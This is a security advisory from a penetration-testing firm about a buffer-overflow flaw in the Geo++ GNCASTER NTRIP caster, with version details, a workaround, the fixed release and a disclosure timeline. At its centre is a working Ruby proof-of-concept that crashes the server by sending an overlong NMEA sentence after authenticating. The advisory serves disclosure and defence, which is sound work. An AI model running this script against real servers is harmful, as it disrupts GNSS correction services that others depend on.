Geo++(R) GNCASTER Insecure Handling Of NMEA-Data

`Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data  
  
During a penetration test, RedTeam Pentesting discovered that the  
GNCaster software does not handle NMEA-data correctly. An attacker that  
has valid login credentials can use this to crash the server software or  
potentially execute code on the server.  
  
Details  
=======  
  
Product: Geo++(R) GNCASTER  
Affected Versions: <= 1.4.0.7  
Fixed Versions: 1.4.0.8  
Vulnerability Type: Memory corruption  
Security Risk: medium  
Vendor URL: http://www.geopp.de  
Vendor Status: notified  
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-002  
Advisory Status: published  
CVE: TBA  
CVE URL: TBA  
  
  
Introduction  
============  
  
"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP  
is a protocol within RTCM to provide GNSS information via Internet."  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
After logging in, the GNCaster server software allows the user to  
receive data streams. For some of these streams the user can send  
so-called NMEA-data to the server to specify the user's geographical  
position. If an attacker sends a long data string, the server software  
crashes. RedTeam Pentesting believes it is also possible to exploit this  
vulnerability to execute code on the server.  
  
  
Proof of Concept  
================  
  
The following ruby script can be used to crash the GNCaster server:  
  
-------------------------------------------------------------------  
#!/usr/bin/env ruby  
######################################  
# #  
# RedTeam Pentesting GmbH #  
# [email protected] #  
# http://www.redteam-pentesting.de #  
# #  
######################################  
  
require 'socket'  
require 'base64'  
  
if ARGV.length < 3 then  
puts "USAGE: %s host:port user:password stream" % __FILE__  
puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__  
puts  
exit  
end  
  
host, port = ARGV[0].split(':')  
pw, stream = ARGV[1..2]  
  
begin  
puts "requesting stream %s" % stream.inspect  
sock = TCPSocket.new(host, port.to_i)  
sock.write("GET %s HTTP/1.1\r\n" % stream)  
sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)  
sock.write("\r\n")  
  
response = sock.readline  
  
puts "server response: %s" % response.inspect  
  
puts "sending modified nmea data"  
sock.write("$GP" + "A" * 2000 +  
"GGA,134047.00,5005.40000000,N,00839.60000000," +  
"E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")  
puts "done"  
end  
-------------------------------------------------------------------  
  
  
Workaround  
==========  
  
A vulnerable server could be protected from this vulnerability by an  
application layer firewall that filters overly long NMEA-data.  
  
  
Fix  
===  
  
Update GNCASTER to version 1.4.0.8.  
  
  
Security Risk  
=============  
  
As an attacker needs valid user credentials for this attack, the risk of  
this vulnerability is regarded as medium. If streams that use NMEA-data  
are publicly available, the risk should be considered as high.  
  
  
History  
=======  
  
2009-07-07 Vulnerability identified during a penetration test  
2009-07-14 Meeting with customer  
2009-12-01 Vendor releases fixed version  
2010-01-27 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
http://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 963-1300  
Dennewartstr. 25-27 Fax : +49 241 963-1304  
52068 Aachen http://www.redteam-pentesting.de/  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck  
`